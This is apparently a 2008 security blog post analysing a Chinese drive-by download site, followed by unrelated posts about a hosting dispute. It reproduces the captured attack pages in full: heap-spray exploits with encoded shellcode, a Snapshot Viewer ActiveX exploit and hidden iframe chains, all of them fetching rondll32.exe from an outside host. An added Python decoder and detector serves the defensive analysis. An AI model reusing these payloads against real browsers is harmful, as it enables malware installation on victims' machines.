cute="ll.A"
qq="ppl"
cn="ica"
kfqq="tion"
gameeedk="O"
gameeedks="p"
gameeedkss="e"
gameeedksss="n"
Set cute_qq_cn_qq_123456 = gameee_2_cn.createobject(www&cute&qq&cn&kfqq, "")
cute_qq_cn_qq_123456.ShellExeCute gameee_kitegggggggggs, "", "", gameeedk&gameeedks&gameeedkss&gameeedksss, 0
</script>
<script type="text/jscript">function init() { document.write("");}window.onload = init;</script>
<body oncontextmenu="return false" onselectstart="return false" ondragstart="return false">


http://www0.douhunqn.cn/csrss/flash.htm

This is detected as HEUR/HTML.Malware and loads yet more iFrames;

*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://www0.douhunqn.cn/csrss/flash.htm
Server IP: 121.11.76.85 [ Resolution failed ]
hpHosts Status: Listed [ Class: EXP ]
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 2
iFrames: 2
Date: 16 September 2008
Time: 02:45:17:45
*****************************************************************
<html>
<script>
window.onerror=function(){return true;}
function init(){window.status="";}window.onload = init;
if(document.cookie.indexOf("play=")==-1)
{
var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
var yt2="play=Yes";
var yt3="path=/";
var yt4="expires=";
var yt1=yt2+yt3+yt4;
document.cookie=yt1+expires.toGMTString();
if(navigator.userAgent.toLowerCase().indexOf("msie")>0)
{

document.write("<iframe src=i1.html width=100 height=0></iframe>");
document.write("");
}


else{
document.write("<iframe src=f2.html width=100 height=0></iframe>");
document.write("");
}
}
</script>
</html>


i1.html, detected as JS/Dldr.Agent.CQ, shows it's loading several SWF (Flash) files, picking one by the installed player's revision number. I've not checked these yet;

*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://www0.douhunqn.cn/csrss/i1.html
Server IP: 121.11.76.85 [ Resolution failed ]
hpHosts Status: Listed [ Class: EXP ]
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 2
iFrames: 0
Date: 16 September 2008
Time: 02:47:38:47
*****************************************************************
<Script type="text/javascript" src="swfobject.js"></Script>
<div id="flashcontent">111</div><div id="flashversion">222</div>
<script type="text/javascript">
var version=deconcept.SWFObjectUtil.getPlayerVersion();
if(version['major']==9){
document.getElementById('flashversion').innerHTML="";
if(version['rev']==115){
var fuckavp = "DZ";
var fuckaxp = "aa";
var so=new SWFObject("./i115.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")
var yt1='rev';
}else if(version[yt1]==45){
var fuckavpxa = "P";
var so=new SWFObject("./i45.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")
var yt2='rev';
}else if(version[yt2]==16){
var so=new SWFObject("./i16.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")
}else if(version['rev']==64){
var fuckavp = "DZ";
var so=new SWFObject("./i64.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")
}else if(version['rev']==28){
var so=new SWFObject("./i28.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")
}else if(version['rev']==47){
var fuckavpx = "DZ";
var so=new SWFObject("./i47.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")
}else if(version['rev']>=124){
if(document.getElementById){
document.getElementById('flashversion').innerHTML=""
}
}
}
</ScripT>


f2.html, detected as HS/Dldr.Agent.QI, seems to do the same;

*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://www0.douhunqn.cn/csrss/f2.html
Server IP: 121.11.76.85 [ Resolution failed ]
hpHosts Status: Listed [ Class: EXP ]
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 3
iFrames: 0
via Proxy: MontanaMenagerie (US)
Date: 16 September 2008
Time: 02:52:33:52
*****************************************************************
<script type="text/javascript" src="swfobject.js"></script>
<div id="flashcontent">111</div><div id="flashversion">222</div>
<script language =javascript>
var version=deconcept.SWFObjectUtil.getPlayerVersion();
if(version['major']==9){
document.getElementById('flashversion').innerHTML="";
if(version['rev']==115){
var fuckavp = "SB";
var so=new SWFObject("./f115.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")
var yt1='rev';
}else if(version[yt1]==64){
var fuckavp = "SB";
var so=new SWFObject("./f64.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")
var yt2='rev';
}else if(version[yt2]==47){
var so=new SWFObject("./f47.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")
}else if(version['rev']==45){
var so=new SWFObject("./f45.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")
}else if(version['rev']==28){
var so=new SWFObject("./f28.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")
}else if(version['rev']==16){
var so=new SWFObject("./f16.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")
}else if(version['rev']>=124){
if(document.getElementById){
document.getElementById('flashversion').innerHTML=""
}
}
}
</script>


http://www0.douhunqn.cn/csrss/net.htm

This is a rather nice little file that, according to its title, is a Visual Studio 0day exploit; what it actually does is write an OBJECT tag for a fixed CLSID with a 1945-byte Mask parameter, having first filled the heap with %u-encoded shellcode so that 0x0c0c0c0c lands inside it;

*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://www0.douhunqn.cn/csrss/net.htm
Server IP: 121.11.76.85 [ Resolution failed ]
hpHosts Status: Listed [ Class: EXP ]
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 1
iFrames: 0
via Proxy: MontanaMenagerie (US)
Date: 16 September 2008
Time: 02:54:25:54
*****************************************************************
<html>
<title>雨田 Microsoft Visual Studio 0day Exploit!</title>
<script language="JavaScript">

var body='<OBJECT CLASSID="CLSID:C932BA85-4374-101B-A56C-00AA003668DC" width="10"><PARAM NAME="Mask" VALUE="';
var body1='"></OBJECT>';
var buf1 = '';
for (i=1;i<=1945;i++)
{
buf1=buf1+unescape("%0c");
}

var Evilcutecode = unescape("%u56E8%u0000%u5300%u5655%u8B57%u246C%u8B18%u3C45%u548B" +
"%u7805%uEA01%u4A8B%u8B18%u205A%uEB01%u32E3%u8B49%u8B34" +
"%uEE01%uFF31%u31FC%uACC0%uE038%u0774%uCFC1%u010D%uEBC7" +
"%u3BF2%u247C%u7514%u8BE1%u245A%uEB01%u8B66%u4B0C%u5A8B" +
"%u011C%u8BEB%u8B04%uE801%u02EB%uC031%u5E5F%u5B5D%u08C2" +
"%u5E00%u306A%u6459%u198B%u5B8B%u8B0C%u1C5B%u1B8B%u5B8B" +
"%u5308%u8E68%u0E4E%uFFEC%u89D6%u53C7%u8E68%u0E4E%uFFEC" +
"%uEBD6%u5A50%uFF52%u89D0%u52C2%u5352%uAA68%u0DFC%uFF7C" +
"%u5AD6%u4DEB%u5159%uFF52%uEBD0%u5A72%u5BEB%u6A59%u6A00" +
"%u5100%u6A52%uFF00%u53D0%uA068%uC9D5%uFF4D%u5AD6%uFF52" +
"%u53D0%u9868%u8AFE%uFF0E%uEBD6%u5944%u006A%uFF51%u53D0" +
"%u7E68%uE2D8%uFF73%u6AD6%uFF00%uE8D0%uFFAB%uFFFF%u7275" +
"%u6D6C%u6E6F%u642E%u6C6C%uE800%uFFAE%uFFFF%u5255%u444C" +
"%u776F%u6C6E%u616F%u5464%u466F%u6C69%u4165%uE800%uFFA0" +
"%uFFFF%u2E2E%u005C%uB7E8%uFFFF%u2EFF%u5C2E%uE800%uFF89" +
"%uFFFF%u7468%u7074%u2F3A%u772F%u7777%u702E%u6570%u6578%u632E%u6D6F%u632F%u7273%u7373%u722F%u6E6F%u6C64%u336C%u2E32%u7865%u0065%u0000");

var evilcuteSize = (Evilcutecode.length * 2);

var CutespraySled = unescape("%u9090"+"%u9090");

var CuteAddress = 0x0c0c0c0c;

var CuteBlockSize = 0x100000;

var spraySledSize = CuteBlockSize - (evilcuteSize + 1);

var CuteheapBlocks = (CuteAddress+CuteBlockSize)/CuteBlockSize;

var x = new window["Array"]();

while (CutespraySled.length*2<spraySledSize)
{
CutespraySled += CutespraySled;
}

CutespraySled = CutespraySled.substring(0,spraySledSize/2);

for (i=0;i<CuteheapBlocks;i++)
{
x[i] = CutespraySled + Evilcutecode;
}

document.write(body+buf1+body1);

</script>
</html>


Malzilla had this to say about the %u escaped code;
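Malzilla's view of that payload boils down to one step, shown here as an added Python snippet (not Malzilla's or the post author's code): decode the %u escapes as little-endian 16-bit words, pull out the printable strings, and flag the spray scaffolding around them (an unescape'd NOP sled, a repeated-byte target address, and the x[i] = sled + code loop). SAMPLE_ESCAPED is assembled from three string-carrying fragments of the net.htm payload above and is not the full payload; SAMPLE_JS is a constructed snippet with the same shape as the spray loop. The strings that fall out (urlmon.dll, URLDownloadToFileA and the ppexe.com URL) are what tell you this shellcode is a plain downloader for rondll32.exe, and the same decoder applies to the tcsafecode in real11.htm further down.

```python
"""Decode %u-escaped shellcode, list its strings, flag heap-spray scaffolding.

Added example, not the hpHosts author's or Malzilla's code. SAMPLE_ESCAPED is
three fragments of the net.htm payload above (not the whole thing);
SAMPLE_JS is a constructed snippet shaped like the spray loop in net.htm.
"""
import re

ESCAPE = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")
# unescape("%u9090"...) / unescape("%u0C0C"...): a 16-bit word of two equal bytes
SLED = re.compile(r"unescape\(\s*[\"']%u([0-9a-f]{2})\1", re.IGNORECASE)
# 0x0c0c0c0c-style addresses: one byte repeated four times
REPEATED_BYTE_ADDR = re.compile(r"0x([0-9a-f]{2})\1{3}\b", re.IGNORECASE)
# x[i] = sled + shellcode
ARRAY_FILL = re.compile(r"\w+\s*\[\s*\w+\s*\]\s*=\s*\w+\s*\+\s*\w+")


def decode_percent_u(text: str) -> bytes:
    """%uXXXX is a UTF-16 code unit stored little-endian; %XX is one byte.
    Anything else (quotes, '+', newlines) is skipped, so the JS source can
    be fed in as-is."""
    out = bytearray()
    for word, byte in ESCAPE.findall(text):
        if word:
            out += int(word, 16).to_bytes(2, "little")
        else:
            out.append(int(byte, 16))
    return bytes(out)


def extract_strings(data: bytes, min_len: int = 4) -> list:
    """Runs of printable ASCII at least min_len long, like strings(1)."""
    return [m.group().decode("ascii")
            for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data)]


def heap_spray_indicators(js: str) -> dict:
    """Cheap static tells for a heap spray; none of them alone is proof."""
    return {
        "nop_sled": SLED.search(js) is not None,
        "spray_loop": ARRAY_FILL.search(js) is not None,
        "spray_addresses": sorted({"0x" + m.group(1).lower() * 4
                                   for m in REPEATED_BYTE_ADDR.finditer(js)}),
    }


# Constructed sample: NOP padding plus three string-carrying fragments copied
# from the net.htm payload above. Not a working payload.
SAMPLE_ESCAPED = (
    '"%u9090%u9090"+'
    '"%u7275%u6D6C%u6E6F%u642E%u6C6C%uE800"+'
    '"%u5255%u444C%u776F%u6C6E%u616F%u5464%u466F%u6C69%u4165%uE800"+'
    '"%u7468%u7074%u2F3A%u772F%u7777%u702E%u6570%u6578%u632E%u6D6F%u632F'
    '%u7273%u7373%u722F%u6E6F%u6C64%u336C%u2E32%u7865%u0065%u0000"'
)

# Constructed snippet with the shape of the spray loop in net.htm.
SAMPLE_JS = """
var CuteAddress = 0x0c0c0c0c;
var CuteBlockSize = 0x100000;
var CutespraySled = unescape("%u9090"+"%u9090");
var x = new window["Array"]();
for (i=0;i<CuteheapBlocks;i++) { x[i] = CutespraySled + Evilcutecode; }
"""

if __name__ == "__main__":
    print(extract_strings(decode_percent_u(SAMPLE_ESCAPED)))
    print(heap_spray_indicators(SAMPLE_JS))
```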



http://www0.douhunqn.cn/csrss/ff.htm

Alas, they really want you to have the executable from ppexe.com, as shown by the following, detected as EXP/SnapshotViewe.B; it hands the Snapshot Viewer control the remote file as SnapshotPath and a local wab.exe path as CompressedPath, which is how the download ends up on disk;

*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://www0.douhunqn.cn/csrss/ff.htm
Server IP: 121.11.76.85 [ Resolution failed ]
hpHosts Status: Listed [ Class: EXP ]
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 1
iFrames: 0
via Proxy: MontanaMenagerie (US)
Date: 16 September 2008
Time: 03:00:02:00
*****************************************************************
<script type="text/javascript">
function killErrors() {
return true;
}
window.onerror = killErrors;

var x;
var obj;
var mycars = new Array();
mycars[0] = "c:/Program Files/Outlook Express/wab.exe";
mycars[1] = "d:/Program Files/Outlook Express/wab.exe";
mycars[2] = "e:/Program Files/Outlook Express/wab.exe";

var yt1="snpvw.Snapshot Viewer Control.1";
var objlcx = new ActiveXObject(yt1);

if(objlcx="[object]")
{

setTimeout('window.location = "ldap://"',3000);


for (x in mycars)
{
obj = new ActiveXObject("snpvw.Snapshot Viewer Control.1")

var buf1 = 'http://www.ppexe.com/csrss/rondll32.exe';
var buf2=mycars[x];

obj.Zoom = 0;
obj.ShowNavigationButtons = false;
obj.AllowContextMenu = false;
obj.SnapshotPath = buf1;

try
{
obj.CompressedPath = buf2;
obj.PrintSnapshot();

}catch(e){}

}
}

</script>


http://www0.douhunqn.cn/csrss/tr.htm

*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://www0.douhunqn.cn/csrss/tr.htm
Server IP: 121.11.76.85 [ Resolution failed ]
hpHosts Status: Listed [ Class: EXP ]
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 4
via Proxy: MontanaMenagerie (US)
Date: 16 September 2008
Time: 03:03:17:03
*****************************************************************
<iframe src=http://www.lukclick.com/search/51777.htm width=100 height=0></iframe>
<iframe src=http://www.letusearch.com/xiaoke.htm width=100 height=0></iframe>
<Iframe src=http://www.onegameplace.com/xiaoke.htm width=100 height=0></iframe>
<Iframe src=http://www.kkexe.com/key.htm width=100 height=0></iframe>


Yeesh! They really want to give us as much as possible, don't they?

*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://www.lukclick.com/search/51777.htm
Server IP: 208.53.147.195 [ . ]
hpHosts Status: Listed [ Class: EXP ]
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 2
iFrames: 7
via Proxy: MontanaMenagerie (US)
Date: 16 September 2008
Time: 03:05:58:05
*****************************************************************
<html>

<head>
<meta http-equiv="Content-Type"
content="text/html; charset=iso-8859-1">
<title> ads </title>
</head>

<body>


<IFRAME src=http://www.afeisearch.com/portal.php?r=0&username=awei width=0 height=0></IFRAME>

<iframe src="http://www.u2clicks.com/portal.php?r=0&username=jiajia" width="0" height="0" name="cpm"></iframe>

<iframe src="http://www.values7.com/banners/view_ad.php?username=mhv88&format=1" style="border:none" name="advertising" scrolling="no" frameborder="0" marginheight="0px" marginwidth="0px" height="31" width="88"></iframe>

<IFRAME src="http://www.kikclicks.com/engine/?ref=beibei" width=1 height=1></IFRAME>

<iframe width="0" height="0" src="http://www.lukclick.com/search/luckymouse.htm"></iframe>

<iframe width="0" height="0" src="http://www.lukclick.com/search/18889.htm"></iframe>

<iframe width=468 height=60 src='http://www.advpoints.com/promote15.php?uid=8918' frameborder=0 marginwidth=0 marginheight=0 vspace=1 hspace=1 allowtransparency=true scrolling=no></iframe>

</body>

<script src='http://goako.com/accounts_js_feed_wizard_display_results.php?idUser=3&username=test&keywords=work at home&adult_filter=off&results_number=10&results_display_style=vertical'></script>

<script src='http://s90.cnzz.com/stat.php?id=1033093&web_id=1033093&online=1&show=line' language='JavaScript' charset='gb2312'></script>

</html>


*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://www.letusearch.com/xiaoke.htm
Server IP: 74.52.24.59 [ mail.wtowww.com ]
hpHosts Status: Listed [ Class: EXP ]
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 1
via Proxy: MontanaMenagerie (US)
Date: 16 September 2008
Time: 03:10:10:10
*****************************************************************
<iframe src=http://www.letusearch.com/search/d.php?aff=xiaoke width=0 height=0></iframe>


*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://www.onegameplace.com/xiaoke.htm
Server IP: 65.110.63.170 [ 65-110-63-170.static.sagonet.net ]
hpHosts Status: Listed [ Class: EXP ]
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 4
iFrames: 1
via Proxy: MontanaMenagerie (US)
Date: 16 September 2008
Time: 03:11:24:11
*****************************************************************
<HTML>
<HEAD><TITLE>OneGameplace</TITLE>
<META http-equiv=Content-Type content="text/html; charset=UTF-8">
</HEAD>
<BODY>
<iframe src=http://www.7scv.com/search/portal.php?username=xiaoke width='0' height='0' frameborder='0'></iframe>
<A href="http://www.51-search.com/search.php?query=Free+Games" target=_blank>Free Games</A></H3>
<UL>
<LI><A href="http://www.51-search.com/search.php?query=Flash+Games" target=_blank>Flash Games</A>
<LI><A href="http://www.51-search.com/search.php?query=Arcade+Games" target=_blank>Arcade Games</A>
<LI><A href="http://www.51-search.com/search.php?query=Play+Online" target=_blank>Play Online</A> </LI></UL>
<H3><A
href="http://www.51-search.com/search.php?query=Free+Online+Games" target=_blank>Free Online Games</A></H3>
<UL>
<LI><A href="http://www.51-search.com/search.php?query=Addicting+Games" target=_blank>Addicting Games</A>
<LI><A href="http://www.51-search.com/search.php?query=Free+Fun" target=_blank>Free Fun</A>
<LI><A href="http://www.51-search.com/search.php?query=Sports+Games" target=_blank>Sports Games</A> </LI></UL>
<H3><A href="http://www.51-search.com/search.php?query=Action+Games" target=_blank>Action Games</A></H3>
<UL>
<LI><A href="http://www.51-search.com/search.php?query=Adventure+Games" target=_blank>Adventure Games</A>

<LI><A href="http://www.51-search.com/search.php?query=Puzzle+Games" target=_blank>Puzzle Games</A>
<LI><A href="http://www.51-search.com/search.php?query=Skills+Games" target=_blank>Skills Games</A>
</LI></UL>
<H3><A href="http://www.51-search.com/search.php?query=Shooting+Games" target=_blank>Shooting Games</A></H3>
<UL>
<LI><A href="http://www.51-search.com/search.php?query=Fighting+Games" target=_blank>Fighting Games</A>
<LI><A href="http://www.51-search.com/search.php?query=Work+at+Home" target=_blank>Work at Home</A>
<LI><A href="http://www.51-search.com/search.php?query=RPG+Games" target=_blank>RPG Games</A> </LI></UL></DIV><!-- dir left end --><!-- dir mid box -->

<DIV id=FT>© 2007-2008 OneGamePlace
</DIV>
</DIV><!-- footer end --></DIV></DIV></DIV></DIV><!-- main container end -->
<table border = "0">
<tr>

<td>

</td>


</tr>
</table>
<div id="eXTReMe"><a href="http://extremetracking.com/open?login=kkology">
<img src="http://t1.extreme-dm.com/i.gif" style="border: 0;"
height="38" width="41" id="EXim" alt="eXTReMe Tracker" /></a>
<script type="text/javascript"><!--
var EXlogin='kkology' // Login
var EXvsrv='s11' // VServer
EXs=screen;EXw=EXs.width;navigator.appName!="Netscape"?
EXb=EXs.colorDepth:EXb=EXs.pixelDepth;
navigator.javaEnabled()==1?EXjv="y":EXjv="n";
EXd=document;EXw?"":EXw="na";EXb?"":EXb="na";
EXd.write("<img src=http://e2.extreme-dm.com",
"/"+EXvsrv+".g?login="+EXlogin+"&",
"jv="+EXjv+"&j=y&srw="+EXw+"&srb="+EXb+"&",
"l="+escape(EXd.referrer)+" height=1 width=1>");//-->
</script><noscript><div id="neXTReMe"><img height="1" width="1" alt=""
src="http://e2.extreme-dm.com/s11.g?login=kkology&j=n&jv=n" />
</div></noscript></div>
<script language="javascript" type="text/javascript">

window.status="Done"

</script>
</body>
</html>


*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://www.kkexe.com/key.htm
Server IP: 125.91.13.147 [ Resolution failed ]
hpHosts Status: Listed [ Class: EXP ]
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 1
via Proxy: MontanaMenagerie (US)
Date: 16 September 2008
Time: 03:13:35:13
*****************************************************************
<iframe src="http://www.bbcseek.com/seo.php?ref=itxiaoke" width="780" height="700" frameborder="0" scrolling="no">Your browser does not support IFRAME</iframe>


http://www0.douhunqn.cn/csrss/real11.htm

This is detected as HTML/Shellcode.Gen and contains;

*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://www0.douhunqn.cn/csrss/real11.htm
Server IP: 121.11.76.85 [ Resolution failed ]
hpHosts Status: Listed [ Class: EXP ]
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 1
iFrames: 0
via Proxy: MontanaMenagerie (US)
Date: 16 September 2008
Time: 03:18:26:18
*****************************************************************
<SCRIPT language="javascript">
Hello="Hi";
var tcsafeobj="o"+"b"+"j"+"e"+"c"+"t";
tcsafe=document.createElement(tcsafeobj);
var tcsafeid="clsid:2F542A2E-EDC9-4B";
var tcsafeids="F7-8CB1-87C9919F7F93";
var tcsafeidx=tcsafeid+tcsafeids;
tcsafe["setAttribute"]("classid", tcsafeidx);
var tcsafe_ulr="%u7468%u7074%u2F3A%u772F%u7777%u702E%u6570%u6578%u632E%u6D6F%u632F%u7273%u7373%u722F%u6E6F%u6C64%u336C%u2E32%u7865%u0065%u0000";
var yt1="%uffff%ua164%u0030%u0000%u408b";
var yt2="%u6856%u4e8e%uec0e%ua3e8%u0000";
var yt3="%u8900%u1445%ue0bb%u020f%u8900";
var yt4="%u0544%u652c%u0000%u5600%u8d56";
var yt5="%u0320%u33f3%u49c9%uad41%uc303";
var yt6="%u5e00%u80bf%u020c%ub900%u0100";
var yt7="%u0c47%u6165%u0070%u5057%u55ff";
var yt8="%u1055%u06c7%u0c80%u0002%uc481";
var tcsafecode = window["unescape"]("%u90"+"90"+"%u90"+"90"+"%u90"+"90"+
"%u6090"+"%u17eb%u645e%u30a1"+"%u0000%u0500%u0800%u0000%uf88b"+"%u00b9"+
"%u0004"+"%uf300%uffa4%ue8e0%uffe4"+yt1+"%u8b0c"+
"%u1c70"+"%u8bad%u0870%uec81%u0200"+"%u0000%uec8b%ue8bb%u020f%u8b00"+"%u8503"+
"%u0fc0"+"%ubb85%u0000%uff00%ue903"+"%u0221%u0000%u895b%u205d%u6856"+"%ufe98"+
"%u0e8a"+"%ub1e8%u0000%u8900%u0c45"+yt2+"%u8900"+
"%u0445"+"%u6856%u79c1%ub8e5%u95e8"+"%u0000%u8900%u1c45%u6856%uc61b"+"%u7946"+
"%u87e8"+"%u0000%u8900%u1045%u6856"+"%ufcaa%u7c0d%u79e8%u0000%u8900"+"%u0845"+
"%u6856"+"%u84e7%ub469%u6be8%u0000"+yt3+"%u3303"+
"%uc7f6"+"%u2845%u5255%u4d4c%u45c7"+"%u4f2c%u004e%u8d00%u285d%uff53"+"%u0455"+
"%u6850"+"%u1a36%u702f%u3fe8%u0000"+"%u8900%u2445%u7f6a%u5d8d%u5328"+"%u55ff"+
"%uc71c"+"%u0544%u5c28%u652e%uc778"+yt4+"%u287d"+
"%uff57"+"%u2075%uff56%u2455%u5756"+"%u55ff%ue80c%u0062%u0000%uc481"+"%u0200"+
"%u0000"+"%u3361%uc2c0%u0004%u8b55"+"%u51ec%u8b53%u087d%u5d8b%u560c"+"%u738b"+
"%u8b3c"+"%u1e74%u0378%u56f3%u768b"+yt5+"%u3356"+
"%u0ff6"+"%u10be%uf23a%u0874%ucec1"+"%u030d%u40f2%uf1eb%ufe3b%u755e"+"%u5ae5"+
"%ueb8b"+"%u5a8b%u0324%u66dd%u0c8b"+"%u8b4b%u1c5a%udd03%u048b%u038b"+"%u5ec5"+
"%u595b"+"%uc25d%u0008%u92e9%u0000"+yt6+"%u0000"+
"%ua4f3"+"%uec81%u0100%u0000%ufc8b"+"%uc783%uc710%u6e07%u6474%uc76c"+"%u0447"+
"%u006c"+"%u0000%uff57%u0455%u4589"+"%uc724%u5207%u6c74%uc741%u0447"+"%u6c6c"+
"%u636f"+"%u47c7%u6108%u6574%uc748"+yt7+"%u8b08"+
"%ub8f0"+"%u0fe4%u0002%u3089%u07c7"+"%u736d%u6376%u47c7%u7204%u0074"+"%u5700"+
"%u55ff"+"%u8b04%u3c48%u8c8b%u8008"+"%u0000%u3900%u0834%u0474%uf9e2"+"%u12eb"+
"%u348d"+"%u5508%u406a%u046a%uff56"+yt8+"%u0100"+
"%u0000"+"%ue8c3%uff69%uffff%u048b"+"%u5324%u5251%u5756%uecb9%u020f"+"%u8b00"+
"%u8519"+"%u75db%u3350%u33c9%u83db"+"%u06e8%ub70f%u8118%ufffb%u0015"+"%u7500"+
"%u833e"+"%u06e8%ub70f%u8118%ufffb"+"%u0035%u7500%u8330%u02e8%ub70f"+"%u8318"+
"%u6afb"+"%u2575%uc083%u8b04%ub830"+"%u0fe0%u0002%u0068%u0000%u6801"+"%u1000"+
"%u0000"+"%u006a%u10ff%u0689%u4489"+"%u1824%uecb9%u020f%uff00%u5f01"+"%u5a5e"+
"%u5b59"+"%ue4b8%u020f%uff00%ue820"+"%ufdda%uffff"+tcsafe_ulr);

var bigblock = unescape("%u0C0C" + "%u0C0C");
var headersize = 20;
var slackspace = headersize + tcsafecode.length;
while (bigblock.length < slackspace) bigblock += bigblock;
var fillblock = bigblock.substring(0,slackspace);
var block = bigblock["substring"](0,bigblock.length - slackspace);
while (block.length + slackspace < 0x40000) block = block + block + fillblock;

var memory = new window["Array"]();
var tcsafes = memory;
for (i = 0; i < 400; i++)
{
tcsafes[i] = block + tcsafecode
}

var buf = '';
while (buf.length < 32) buf = buf + unescape("%0C");

var m = '';

m = tcsafe.Console;
tcsafe.Console = buf;
tcsafe.Console = m;

m = tcsafe.Console;
tcsafe.Console = buf;
tcsafe.Console = m;
</script>


Once again, this downloads rondll32.exe.

http://www0.douhunqn.cn/csrss/lzx.htm
http://www0.douhunqn.cn/csrss/real10.htm
http://www0.douhunqn.cn/csrss/Bfyy.htm


All 3 of these seem to return what looks like a 404, but I can't read a bleedin' word, so I'm not 100% sure;

*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://www0.douhunqn.cn/csrss/Bfyy.htm
Server IP: 121.11.76.85 [ Resolution failed ]
hpHosts Status: Listed [ Class: EXP ]
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 0
via Proxy: MontanaMenagerie (US)
Date: 16 September 2008
Time: 03:21:39:21
*****************************************************************
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>无法找到该页</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=GB2312">
<STYLE type="text/css">
BODY { font: 9pt/12pt 宋体 }
H1 { font: 12pt/15pt 宋体 }
H2 { font: 9pt/12pt 宋体 }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>无法找到该页</h1>
您正在搜索的页面可能已经删除、更名或暂时不可用。
<hr>
<p>请尝试以下操作：</p>
<ul>
<li>确保浏览器的地址栏中显示的网站地址的拼写和格式正确无误。</li>
<li>如果通过单击链接而到达了该网页，请与网站管理员联系，通知他们该链接的格式不正确。
</li>
<li>单击<a href="javascript:history.back(1)">后退</a>按钮尝试另一个链接。</li>
</ul>
<h2>HTTP 错误 404 - 文件或目录未找到。<br>Internet 信息服务 (IIS)</h2>
<hr>
<p>技术信息（为技术支持人员提供）</p>
<ul>
<li>转到 <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft 产品支持服务</a>并搜索包括“HTTP”和“404”的标题。</li>
<li>打开“IIS 帮助”（可在 IIS 管理器 (inetmgr) 中访问），然后搜索标题为“网站设置”、“常规管理任务”和“关于自定义错误消息”的主题。</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Saturday, 13 September 2008

WebGrid has now closed indefinitely

I'm sorry to say, after 9 years of selflessly serving the freeware community, my good friend Bob has decided to close down WebGrid on an indefinite basis.

Part of the reason for this is due to FastHosts being a pain in the rear and deciding the site was using "too many resources" (interesting considering it worked perfectly for over 2 years without their having an issue). First they moved the site to a "probation server" and gave Bob 7 days to get it sorted out - we worked on it and tweaked it as much as we could. Second, they advised (partial quote);

The developer of the site could set it up on their own Windows PC or server, then use FileMon (a free download from Microsoft) to monitor the activity on the database.

Alternatively they could migrate the database to mySQL or MSSQL, which would almost certainly resolve the performance issue immediately.

Regards,

Russell Workman


I actually did check the site on my own machine, a much, much lower-spec machine than their server, and it NEVER CAUSED A RESOURCE ISSUE! By far the funniest, however, is their mentioning migrating the database to MySQL or MSSQL. Why is this funny? MySQL is, after all, a free database, right? WRONG! FastHosts actually charge £70+ PER YEAR for MySQL, and SEVERAL HUNDRED PER YEAR for MSSQL.

Finally, when we'd made the tweaks, we received a note from Chris Davis, advising us (partial quote);

We are not confident that the problem has been resolved and believe that your site would still present a threat to the performance of the shared platform were it to be moved back. We have therefore suspended all services to the website in question.

In order to regain access to the site you will need to contact us explaining the steps that you will take to address the problem. On receipt of this communication we will be able to re-enable access to the site to allow you to resolve the problem. Should you require us to remove any unacceptable data and related services in order to resolve this problem we will require your explicit authorisation to do so. Once we are confident that the problem has been resolved we will move your website back to the shared hosting environment. Any further performance issues caused by your website will result in the site being permanently suspended and so we strongly advise that, in future, you actively monitor the resources used by the domains that
you host with us.

If the problem has not been resolved within the next 7 days your site will be permanently suspended.


I am personally annoyed by FastHosts because of this issue, not just because they decided, after it not being a problem for 2 YEARS, that it was automagically causing an issue, but because Bob has run a great website for several years, at his own expense, and I doubt I am going to be alone in being sorry to see WebGrid go.

Friday, 12 September 2008

cr4nk.ws again - another Directi, LogicBoxes, LiquidWeb exploit gang

I've been seeing this in RFI attacks lately, and even documented such on the blog;

http://hphosts.blogspot.com/2008/09/alas-another-exploit-attempt-rfiphp.html

Quite why the blog isn't displaying on IE/Avant properly escapes me, but that's another matter.

I've found this one again in yesterday's server logs (attacker: 195.135.183.134 - mail3.caris.de);

